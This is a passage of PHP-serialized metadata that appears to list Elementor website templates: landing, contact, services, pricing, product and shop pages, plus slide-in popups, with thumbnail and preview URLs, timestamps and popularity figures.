Photography\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp1-l.png\";s:12:\"tmpl_created\";s:10:\"1490707385\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/landing-page-photography/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"109\";s:16:\"popularity_index\";s:2:\"30\";s:11:\"trend_index\";s:2:\"59\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:536;a:14:{s:2:\"id\";s:3:\"641\";s:5:\"title\";s:28:\"Landing Page &#8211; Fashion\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2016/12/fashion-landing-page.jpg\";s:12:\"tmpl_created\";s:10:\"1481549264\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-fashion/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"110\";s:16:\"popularity_index\";s:3:\"275\";s:11:\"trend_index\";s:3:\"441\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:537;a:14:{s:2:\"id\";s:3:\"189\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 1\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0005.png\";s:12:\"tmpl_created\";s:10:\"1470820715\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-tourism/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"111\";s:16:\"popularity_index\";s:2:\"14\";s:11:\"trend_index\";s:2:\"17\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:538;a:14:{s:2:\"id\";s:5:\"10169\";s:5:\"title\";s:37:\"Slide In | Register | Subscribe | App\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2019/01/slideinapp_small.png\";s:12:\"tmpl_created\";s:10:\"1547852334\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:126:\"https://library.elementor.com/popups/slide-in-register-subscribe-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"112\";s:16:\"popularity_index\";s:3:\"353\";s:11:\"trend_index\";s:3:\"470\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:539;a:14:{s:2:\"id\";s:4:\"1547\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 2\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-1.png\";s:12:\"tmpl_created\";s:10:\"1494352115\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"112\";s:16:\"popularity_index\";s:3:\"287\";s:11:\"trend_index\";s:3:\"361\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:540;a:14:{s:2:\"id\";s:4:\"1546\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 3\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-2.png\";s:12:\"tmpl_created\";s:10:\"1494352116\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"113\";s:16:\"popularity_index\";s:3:\"382\";s:11:\"trend_index\";s:3:\"514\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:541;a:14:{s:2:\"id\";s:4:\"1545\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 4\";s:9:\"thumbnail\";s:82:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Truism-3.png\";s:12:\"tmpl_created\";s:10:\"1494352118\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"114\";s:16:\"popularity_index\";s:3:\"326\";s:11:\"trend_index\";s:3:\"446\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:542;a:14:{s:2:\"id\";s:4:\"2714\";s:5:\"title\";s:30:\"Landing Page &#8211; Tourism 5\";s:9:\"thumbnail\";s:86:\"https://library.elementor.com/wp-content/uploads/2017/11/Vacation-â€“-Landing-Page.png\";s:12:\"tmpl_created\";s:10:\"1509631782\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:112:\"https://library.elementor.com/landing-page-tourism-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"115\";s:16:\"popularity_index\";s:3:\"319\";s:11:\"trend_index\";s:3:\"411\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:543;a:14:{s:2:\"id\";s:4:\"9680\";s:5:\"title\";s:23:\"Slide In | Content Lock\";s:9:\"thumbnail\";s:91:\"https://library.elementor.com/wp-content/uploads/2019/01/Slide-in_Content-lock_small_01.png\";s:12:\"tmpl_created\";s:10:\"1547010967\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:121:\"https://library.elementor.com/popups/slide-in-content-lock-01/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"115\";s:16:\"popularity_index\";s:3:\"566\";s:11:\"trend_index\";s:3:\"582\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:544;a:14:{s:2:\"id\";s:3:\"195\";s:5:\"title\";s:28:\"Landing Page &#8211; Product\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0006.png\";s:12:\"tmpl_created\";s:10:\"1470820765\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-product/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"116\";s:16:\"popularity_index\";s:2:\"39\";s:11:\"trend_index\";s:2:\"90\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:545;a:14:{s:2:\"id\";s:3:\"197\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 1\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0007.png\";s:12:\"tmpl_created\";s:10:\"1470825711\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/landing-page-real-estate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"117\";s:16:\"popularity_index\";s:2:\"89\";s:11:\"trend_index\";s:3:\"193\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:546;a:14:{s:2:\"id\";s:4:\"9783\";s:5:\"title\";s:31:\"Slide In | Register | Subscribe\";s:9:\"thumbnail\";s:81:\"https://library.elementor.com/wp-content/uploads/2019/01/slidein_yellow_small.png\";s:12:\"tmpl_created\";s:10:\"1547831059\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:124:\"https://library.elementor.com/popups/slide-in-register-subscribe/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:5:\"popup\";s:7:\"subtype\";s:8:\"slide-in\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"117\";s:16:\"popularity_index\";s:3:\"461\";s:11:\"trend_index\";s:3:\"494\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"1\";}i:547;a:14:{s:2:\"id\";s:4:\"1193\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 2\";s:9:\"thumbnail\";s:66:\"https://library.elementor.com/wp-content/uploads/2017/03/lp3-l.png\";s:12:\"tmpl_created\";s:10:\"1490707422\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"118\";s:16:\"popularity_index\";s:2:\"51\";s:11:\"trend_index\";s:2:\"94\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:548;a:14:{s:2:\"id\";s:4:\"1415\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 3\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-1.png\";s:12:\"tmpl_created\";s:10:\"1494352106\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"119\";s:16:\"popularity_index\";s:3:\"305\";s:11:\"trend_index\";s:3:\"349\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:549;a:14:{s:2:\"id\";s:4:\"1414\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 4\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-2.png\";s:12:\"tmpl_created\";s:10:\"1494352107\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"120\";s:16:\"popularity_index\";s:3:\"406\";s:11:\"trend_index\";s:3:\"425\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:550;a:14:{s:2:\"id\";s:4:\"1413\";s:5:\"title\";s:34:\"Landing Page &#8211; Real Estate 5\";s:9:\"thumbnail\";s:87:\"https://library.elementor.com/wp-content/uploads/2017/05/Landing-Page-Real-Estate-3.png\";s:12:\"tmpl_created\";s:10:\"1494352109\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:116:\"https://library.elementor.com/landing-page-real-estate-5/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:134:\"[\"Agent\",\"business\",\"clean\",\"corporate\",\"flat\",\"google maps\",\"homes\",\"listing\",\"modern\",\"real estate\",\"realestate\",\"realtor\",\"realty\"]\";s:10:\"menu_order\";s:3:\"121\";s:16:\"popularity_index\";s:3:\"374\";s:11:\"trend_index\";s:3:\"464\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:551;a:14:{s:2:\"id\";s:4:\"1573\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 1\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-02.png\";s:12:\"tmpl_created\";s:10:\"1494352133\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-1/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"122\";s:16:\"popularity_index\";s:3:\"412\";s:11:\"trend_index\";s:3:\"495\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:552;a:14:{s:2:\"id\";s:4:\"1572\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 2\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-03.png\";s:12:\"tmpl_created\";s:10:\"1494352134\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"123\";s:16:\"popularity_index\";s:3:\"449\";s:11:\"trend_index\";s:3:\"473\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:553;a:14:{s:2:\"id\";s:4:\"1570\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 3\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-01.png\";s:12:\"tmpl_created\";s:10:\"1494352136\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-3/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"124\";s:16:\"popularity_index\";s:3:\"481\";s:11:\"trend_index\";s:3:\"563\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:554;a:14:{s:2:\"id\";s:4:\"1571\";s:5:\"title\";s:29:\"Landing Page &#8211; Coupon 4\";s:9:\"thumbnail\";s:70:\"https://library.elementor.com/wp-content/uploads/2017/05/Coupon-04.png\";s:12:\"tmpl_created\";s:10:\"1494352138\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:111:\"https://library.elementor.com/landing-page-coupon-4/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"125\";s:16:\"popularity_index\";s:3:\"459\";s:11:\"trend_index\";s:3:\"543\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:555;a:14:{s:2:\"id\";s:3:\"192\";s:5:\"title\";s:28:\"Landing Page &#8211; Webinar\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0015.png\";s:12:\"tmpl_created\";s:10:\"1470820734\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:110:\"https://library.elementor.com/landing-page-webinar/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"126\";s:16:\"popularity_index\";s:2:\"82\";s:11:\"trend_index\";s:3:\"169\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:556;a:14:{s:2:\"id\";s:4:\"2141\";s:5:\"title\";s:32:\"Contact &#8211; Delivery Company\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-contact.png\";s:12:\"tmpl_created\";s:10:\"1499774122\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:114:\"https://library.elementor.com/contact-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"127\";s:16:\"popularity_index\";s:3:\"279\";s:11:\"trend_index\";s:3:\"354\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:557;a:14:{s:2:\"id\";s:3:\"137\";s:5:\"title\";s:22:\"Contact &#8211; Modern\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0013.png\";s:12:\"tmpl_created\";s:10:\"1470829828\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:104:\"https://library.elementor.com/contact-modern/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"128\";s:16:\"popularity_index\";s:2:\"32\";s:11:\"trend_index\";s:2:\"86\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:558;a:14:{s:2:\"id\";s:3:\"256\";s:5:\"title\";s:26:\"Contact &#8211; Restaurant\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0011.png\";s:12:\"tmpl_created\";s:10:\"1470829796\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/contact-restaurant/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"129\";s:16:\"popularity_index\";s:2:\"93\";s:11:\"trend_index\";s:3:\"181\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:559;a:14:{s:2:\"id\";s:4:\"2150\";s:5:\"title\";s:25:\"Contact &#8211; Cake Shop\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/07/cake-contact.png\";s:12:\"tmpl_created\";s:10:\"1499774127\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-cake-shop/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"130\";s:16:\"popularity_index\";s:2:\"53\";s:11:\"trend_index\";s:3:\"126\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:560;a:14:{s:2:\"id\";s:3:\"223\";s:5:\"title\";s:21:\"Contact &#8211; Hotel\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0002.png\";s:12:\"tmpl_created\";s:10:\"1470820471\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/contact-hotel/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"131\";s:16:\"popularity_index\";s:2:\"90\";s:11:\"trend_index\";s:3:\"227\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:561;a:14:{s:2:\"id\";s:2:\"24\";s:5:\"title\";s:25:\"Contact &#8211; Corporate\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0012.png\";s:12:\"tmpl_created\";s:10:\"1470248619\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:107:\"https://library.elementor.com/contact-corporate/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"132\";s:16:\"popularity_index\";s:2:\"12\";s:11:\"trend_index\";s:2:\"16\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:562;a:14:{s:2:\"id\";s:3:\"184\";s:5:\"title\";s:23:\"Services &#8211; Moving\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0017.png\";s:12:\"tmpl_created\";s:10:\"1470829889\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:105:\"https://library.elementor.com/services-moving/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"133\";s:16:\"popularity_index\";s:2:\"21\";s:11:\"trend_index\";s:2:\"33\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:563;a:14:{s:2:\"id\";s:3:\"625\";s:5:\"title\";s:31:\"Services &#8211; Cake Shop Menu\";s:9:\"thumbnail\";s:75:\"https://library.elementor.com/wp-content/uploads/2016/12/cake-shop-menu.jpg\";s:12:\"tmpl_created\";s:10:\"1481549196\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:113:\"https://library.elementor.com/services-cake-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"134\";s:16:\"popularity_index\";s:3:\"444\";s:11:\"trend_index\";s:3:\"523\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:564;a:14:{s:2:\"id\";s:3:\"187\";s:5:\"title\";s:20:\"Services &#8211; Fun\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0001.png\";s:12:\"tmpl_created\";s:10:\"1470829892\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:102:\"https://library.elementor.com/services-fun/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"135\";s:16:\"popularity_index\";s:2:\"55\";s:11:\"trend_index\";s:3:\"128\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:565;a:14:{s:2:\"id\";s:3:\"238\";s:5:\"title\";s:27:\"Services &#8211; Consulting\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0014.png\";s:12:\"tmpl_created\";s:10:\"1470829865\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:109:\"https://library.elementor.com/services-consulting/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"136\";s:16:\"popularity_index\";s:2:\"20\";s:11:\"trend_index\";s:2:\"32\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:566;a:14:{s:2:\"id\";s:3:\"647\";s:5:\"title\";s:33:\"Services &#8211; Coffee Shop Menu\";s:9:\"thumbnail\";s:76:\"https://library.elementor.com/wp-content/uploads/2016/12/restaurant-menu.jpg\";s:12:\"tmpl_created\";s:10:\"1481549320\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-coffee-shop-menu/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"137\";s:16:\"popularity_index\";s:3:\"387\";s:11:\"trend_index\";s:3:\"455\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:567;a:14:{s:2:\"id\";s:4:\"2138\";s:5:\"title\";s:33:\"Services &#8211; Delivery Company\";s:9:\"thumbnail\";s:78:\"https://library.elementor.com/wp-content/uploads/2017/07/delivery-services.png\";s:12:\"tmpl_created\";s:10:\"1499774119\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:115:\"https://library.elementor.com/services-delivery-company/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"138\";s:16:\"popularity_index\";s:3:\"342\";s:11:\"trend_index\";s:3:\"501\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:568;a:14:{s:2:\"id\";s:3:\"823\";s:5:\"title\";s:19:\"Pricing &#8211; App\";s:9:\"thumbnail\";s:72:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-app.jpg\";s:12:\"tmpl_created\";s:10:\"1485272966\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/pricing-app-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"139\";s:16:\"popularity_index\";s:3:\"309\";s:11:\"trend_index\";s:3:\"433\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:569;a:14:{s:2:\"id\";s:3:\"824\";s:5:\"title\";s:24:\"Pricing &#8211; Software\";s:9:\"thumbnail\";s:77:\"https://library.elementor.com/wp-content/uploads/2017/01/pricing-software.png\";s:12:\"tmpl_created\";s:10:\"1485272900\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:108:\"https://library.elementor.com/pricing-software-2/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"140\";s:16:\"popularity_index\";s:3:\"334\";s:11:\"trend_index\";s:3:\"404\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:570;a:14:{s:2:\"id\";s:3:\"825\";s:5:\"title\";s:24:\"Product &#8211; Speakers\";s:9:\"thumbnail\";s:73:\"https://library.elementor.com/wp-content/uploads/2017/01/product-page.jpg\";s:12:\"tmpl_created\";s:10:\"1485272513\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:106:\"https://library.elementor.com/product-speakers/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:2:\"[]\";s:10:\"menu_order\";s:3:\"141\";s:16:\"popularity_index\";s:3:\"349\";s:11:\"trend_index\";s:3:\"522\";s:6:\"is_pro\";s:1:\"1\";s:17:\"has_page_settings\";s:1:\"0\";}i:571;a:14:{s:2:\"id\";s:3:\"245\";s:5:\"title\";s:21:\"Product &#8211; Clean\";s:9:\"thumbnail\";s:65:\"https://library.elementor.com/wp-content/uploads/2016/08/0020.png\";s:12:\"tmpl_created\";s:10:\"1470829876\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:103:\"https://library.elementor.com/product-clean/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:48:\"[\"fast\",\"minimal\",\"minimalistic\",\"seo\",\"simple\"]\";s:10:\"menu_order\";s:3:\"142\";s:16:\"popularity_index\";s:2:\"63\";s:11:\"trend_index\";s:3:\"115\";s:6:\"is_pro\";s:1:\"0\";s:17:\"has_page_settings\";s:1:\"0\";}i:572;a:14:{s:2:\"id\";s:4:\"1075\";s:5:\"title\";s:19:\"Shop &#8211; Sweets\";s:9:\"thumbnail\";s:67:\"https://library.elementor.com/wp-content/uploads/2017/03/Sweets.png\";s:12:\"tmpl_created\";s:10:\"1488810871\";s:6:\"author\";s:9:\"Elementor\";s:3:\"url\";s:101:\"https://library.elementor.com/shop-sweets/?utm_source=library&utm_medium=wp-dash&utm_campaign=preview\";s:4:\"type\";s:4:\"page\";s:7:\"subtype\";s:4:\"page\";s:4:\"tags\";s:154:\"[\"bakery\",\"beverage\",\"business\",\"cafe\",\"candy bar\",\"catering\",\"delivery service\",\"Food\",\"online shop\",\"pastry\",\"Restaurant\",\"store\",\"sweet 